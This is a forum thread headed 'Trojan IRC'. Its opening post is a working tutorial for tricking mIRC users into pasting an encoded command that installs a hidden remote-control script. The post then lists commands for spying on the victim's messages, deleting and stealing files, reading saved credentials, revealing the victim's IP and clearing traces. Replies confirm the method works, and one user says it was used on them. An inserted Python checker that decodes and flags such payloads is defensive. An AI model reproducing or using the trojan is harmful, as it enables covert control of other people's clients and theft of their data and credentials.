Trojan IRC

Postby Korigan » Thu Jan 03, 2008 3:24 pm

//Powered By DarkFel 8)
1) Infect the victim

The Trojan can be activated by the victim when he writes the next command:



//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc | msg YOURNICK i love you



YOURNICK = your nick. The victim will message you 'I love you' once he writes the command. You can edit it or just delete
the ' | msg YOURNICK I love you ' part.



This is what the command does: it will make a new .mrc file czm and put this in it (which is encoded in the command):

on ^*:text:ins*:?:{ . $+ $2- | haltdef }

The haltdef will block your messages to the victim beginning with 'ins'. With this the user can't see your commands, so he won't have a clue who is controlling his mIRC.

Example:

/msg victim ins msg #channel hi

This will let the victim message #channel the 'hi' message, but the victim will NOT see it, all others in the channel will see.
And the victim will not see your message 'ins msg #channel hi' because it will be blocked by 'haltdef'. Nice isn't it? :)



When the victim has executed that command the Trojan is active. You can add a spy function if you want (this can cause him an excess flood if he is on too many 'popular' channels, i.e. channels with much activity). For adding the spy part (it will send you all his activity, messages received, messages sent and commands executed) execute the next commands:



2) Spy the victim:

/msg victim ins write -c myscript.mrc

/msg victim ins unload -rs myscript.mrc

/msg victim insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }

/msg victim ins write myscript.mrc on *:TEXT:*:*: { .msg YOURNICK $timestamp <- < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ > $1- }

/msg victim ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,< $+ $me $+ >,[COMMAND]) $1- }

/msg victim ins load -rs myscript.mrc



Once that is done, you'll receive the msgs immediately. You can let the spy function stop by typing the next command:



/msg victim ins unload -rs myscript.mrc



Note: victim = the nick of the victim who has executed that command, and who has the Trojan.



3) Make other remote files (.mrc)

You can make remote files yourself and add useful functions in it.

/msg victim insert write -c YOURSCRIPTNAME.mrc on 1:TEXT:*!opme*:#CHANNEL:/mode #channel +o $nick

/msg victim ins .load -rs YOURSCRIPTNAMEt.mrc



4) Use of the Trojan:

Well this is limited, but this is the main basic: you can make commands yourself, I'll try to make more advanced commands later :)



REMOVE FILE :

/msg victim ins remove C:\Textfile.txt



OPEN SITE:

/msg victim ins url www.site.com



JOIN CHANNEL:

/msg victim ins join #channel



PART CHANNEL:

/msg victim ins part #channel



QUERY USER:

/msg victim ins query user



MSG USER:

/msg victim ins msg user



INVITE USER:

/msg victim ins invite user #channel



BAN USER:

/msg victim ins ban #channel user



KICK USER:

/msg victim ins kick #channel user



IGNORE USER:

/msg victim ins ignore *!*@host.com



UNIGNORE USER:

/msg victim ins unignore *!*@host.com



CHANGE NICK:

/msg victim ins nick thenickyouwant



OP USER:

/msg victim ins mode #channel +o user



VOICE USER:

/msg victim ins mode #channel +v user



CHANGE TOPIC:

/msg victim ins topic #channel text



RECEIVE FILE:

/msg victim ins dcc send user file

or

/msg victim ins dcc send user C:\something.sth



EDIT TEXT:

/msg victim ins write -l1 C:\TESTING.txt thetextyouwanttoedit

(-l1 --> first line)



READ A PIECE OF FILE (LIKE PERFORM):

The following commands must be executed after each other:

/msg victim ins write mab alias abcd123 { msg user $read(perform.ini,w,*auth*) }

/msg victim ins .load -rs mab

/msg victim ins abcd123



SEARCH HARD DISK FOR A FILE:

/msg victim ins write MAB1 alias MAB1 { .echo $findfile(C:\,porn.*,0,msg user $1-) }

/msg victim ins .load -rs MAB1

/msg victim ins MAB1



LET HIS mIRC CRASH:

/msg victim ins write MAB2 alias MAB2 { while (1 != 2) { beep } }

/msg victim ins .load -rs MAB2

/msg victim ins MAB2



SCAN HIS HARD DISK AND SAVE IT AS .txt:

//echo $findfile(c:,*.*,0,write C:\M_A_B.txt $1-)



Note: Probably you want this file, well you do this:

/msg victim ins dcc send YOURNICK C:\M_A_B.txt

** Important note **

The victim will see the send dialog, so act quick. For security reasons I suggest writing another trojan in another file, like:

/msg victim write MyNewScript.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs MyNewScript.mrc



FIND THE VICTIMs IP WHEN HE USES A MASK:

/msg victim ins //msg YOURNICK $ip



FIND THE VICTIMs HOST WHEN HE USES A MASK:

/msg victim ins //msg YOURNICK $host



FIND THE VICTIMs OS:

/msg victim ins //msg YOURNICK $os



FIND OUT ON WHICH SERVER THE VICTIM IS LOCATED:

/msg victim ins //msg YOURNICK $server



FIND OUT WHAT THE REAL TIME ON THE VICTIMs PC IS:

/msg victim ins //msg YOURNICK $time



FIND OUT WHAT THE REAL DATE ON THE VICTIMs PC IS:

/msg victim ins //msg YOURNICK $date



FIND OUT IF THE VICTIM IS AWAY:

/msg victim ins //msg YOURNICK $away



FIND OUT THE IP OF THE SERVER THE VICTIM IS ON:

/msg victim ins //msg YOURNICK $serverIP



FIND OUT ON WHAT URLs THE VICTIM IS ON AT THE MOMENT:

/msg victim ins //msg YOURNICK $url



FIND OUT WHAT THE REAL mIRC VERSION THE VICTIM HAS:

/msg victim ins //msg YOURNICK $victim



TURN THE AUTO JOIN ON INVITE ON (or OFF)

/msg victim ins ajinvite on



LET THE VICTIM MESSAGE SOMETHING ON ALL THE CHANNELS HE IS ON:

/msg victim ins amsg <the message you want him to say on all channels>



CHANGE THE VICTIMs ALTERNATIVE NICK:

/msg victim ins anick <nickname>



CHANGE THE VICTIMs BACKGROUND PICTURE:

/msg victim ins background [-aemsgdluhcfnrtpx] [window] [filename]

with

-a = active window

-m = main mIRC window

-s = status window

-g = finger window

-d = single message window



-e = set as default



-cfnrtp = center, fill, normal, stretch, tile, photo



-l = toolbar

-u = toolbar buttons

-h = switchbar



-x = no background picture



LET THE "mIRC CHANNEL CENTRAL" OF A CHANNEL POP UP:

/msg victim ins channel #CHANNELNAME

Note: the victim must be on #CHANNELNAME



CLEAR YOUR TRACKS BY CLEARING THE TEXT ON THE OPEN WINDOWS:

/msg victim ins clearall [-snqmtgu]

s = status, n = channel, q = query, m = message window, t = chat, g = finger, u = custom.



LET THE VICTIM CLIPBOARD A SPECIFIED TEXT:

/msg victim ins clipboard <the text you want to be clipboarded>



CLOSE THE OPEN QUERIES OF THE VICTIM:

/msg victim ins close



LET THE VICTIM QUIT mIRC:

/msg victim ins quit <the quit message you want>



LET THE VICTIM DISCONNECT FROM SERVER:

/msg victim ins disconnect



LET THE VICTIM CHANGE SERVER:

/msg victim ins server the.server.you.want



LET THE VICTIM OPEN A NEW SERVER NEXT TO THE SERVER HE IS ALREADY IN:

/msg victim ins server -m

/msg victim ins server the.server.you.want



LET THE VICTIM GIVE YOU FLAGS (if he is able to):

/msg victim ins msg |TheBot| chanlev #channel YOURNICK +flag

Note:

|TheBot| = the bot who can give flags

Chanlev = can be different, sometimes it is also, "adduser"

flag = the flag you want

YOURNICK = your nick



CHANGE THE VICTIMs FONT AND FONT SIZE:

/msg victim ins font -asgbd <fontsize> <fontname>



CHANGE THE VICTIMs FULL NAME:

/msg victim ins fullname <name>



LET THE VICTIM REJOIN A CHANNEL:

/msg victim ins hop #CHANNEL



MAKE A NEW DIRECTORY ON THE VICTIMs HARD DISK:

/msg victim ins mkdir <dirname>



NOTE:

victim = nick of the victim

user = your nick
Korigan
Site Admin
 
Posts: 1781
Joined: Tue May 29, 2007 6:57 pm
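
Seen from the defender's side, the pasted one-liner and the handler it installs in the post above can both be recognised mechanically. The following is an added example, not part of the original post: a Python check that decodes `$decode(...,m)` arguments in a command someone asks you to paste and flags message handlers that run incoming text as commands. The function names and the two benign samples are constructed for illustration.

```python
import base64
import re

# $decode(<data>,m) is mIRC's base64 decode; a pasted one-liner can hide script text in it.
DECODE_CALL = re.compile(r"\$decode\(\s*([A-Za-z0-9+/=]+)\s*,\s*m\s*\)", re.I)
LOADS_SCRIPT = re.compile(r"\.?load\s+-rs\b", re.I)
# Remote event header for incoming messages; a leading ^ lets haltdef suppress display.
EVENT_HDR = re.compile(r"\bon\s+(\^?)[^:\s]*:(text|notice|action):", re.I)
# Body that glues words of the incoming message onto "." and runs them as a command.
EXEC_INPUT = re.compile(r"\.\s*\$\+\s*\$\d+-")


def reveal(command):
    """Return the plaintext of every $decode(...,m) argument in a command line."""
    hidden = []
    for match in DECODE_CALL.finditer(command):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
            hidden.append(raw.decode("latin-1"))
        except ValueError:  # binascii.Error subclasses ValueError
            hidden.append("<not valid base64>")
    return hidden


def audit(line):
    """Flag a pasted command or one line of a .mrc file; returns sorted findings."""
    findings = set()
    decoded = reveal(line)
    if decoded and LOADS_SCRIPT.search(line):
        findings.add("loads a script whose text is hidden in $decode")
    for text in [line] + decoded:
        header = EVENT_HDR.search(text)
        if header and EXEC_INPUT.search(text):
            findings.add("event handler executes incoming message text")
            if header.group(1) and re.search(r"\bhaltdef\b", text, re.I):
                findings.add("handler hides the triggering message (^ + haltdef)")
    return sorted(findings)


# Command line from the post (trailing msg part dropped); the other two are constructed.
POSTED = ("//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m)"
          " | .load -rs czm.mrc")
BENIGN_DECODE = "//echo -a $decode(aGVsbG8=,m)"
BENIGN_HANDLER = "on *:TEXT:!time:#: { msg $chan $time }"

if __name__ == "__main__":
    for sample in (POSTED, BENIGN_DECODE, BENIGN_HANDLER):
        print(sample[:40], "->", reveal(sample), audit(sample))
```

Running `audit` over every line of the `.mrc` files in a mIRC directory applies the same checks to scripts that are already loaded.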

Postby sarrek » Thu Jan 03, 2008 4:19 pm

I'm never going on mIRC again xD^^
sarrek
Projets
 
Posts: 108
Joined: Sat Nov 03, 2007 2:27 am

Postby DarkFel » Fri Jan 04, 2008 1:10 pm

oh come on 8) powered by DarkFel lol!
DarkFel
Projets
 
Posts: 78
Joined: Tue Dec 11, 2007 7:21 pm

Postby xhunter » Sun May 18, 2008 10:41 am

lol Korigan, where did you get this tutorial?

maybe you can find it on nettools
but this is old!
xhunter
Projets
 
Posts: 44
Joined: Fri Dec 28, 2007 9:25 pm

Postby Ness » Mon May 19, 2008 4:39 am

Old? ... maybe.
But it works! Don't worry..
Ness
Projets
 
Posts: 61
Joined: Sun Apr 27, 2008 12:44 am

Postby Korigan » Mon May 19, 2008 12:15 pm

It wasn't me, it was Darkfel :P

But yes, it works, and let's say it was meant to raise a bit of awareness about IRC and to talk about a concept a little different from the other exploits covered, which mostly revolve around forums.

So here we see a way of exploiting another protocol. It would be good to do the same thing for ftp, ssh, snmp, etc., by the way.

@++ Korigan
Korigan
Site Admin
 
Posts: 1781
Joined: Tue May 29, 2007 6:57 pm

Postby Skorm » Mon May 19, 2008 5:41 pm

Well said, Ness! :D
Skorm
 
Posts: 792
Joined: Fri Feb 22, 2008 12:01 pm
Location: 127.0.0.1

Postby Romain » Sun May 25, 2008 1:47 pm

:( I got caught by this a long time ago -_- that c$$ told me it was so I wouldn't get mIRC trojans
I was seriously pissed off :x
Romain
Projets
 
Posts: 1
Joined: Fri Jan 04, 2008 5:19 pm

Postby Guilou » Sun May 25, 2008 5:04 pm

It would be nice to stop confusing mIRC and IRC...
Guilou
Projets
 
Posts: 7
Joined: Tue May 20, 2008 7:08 pm
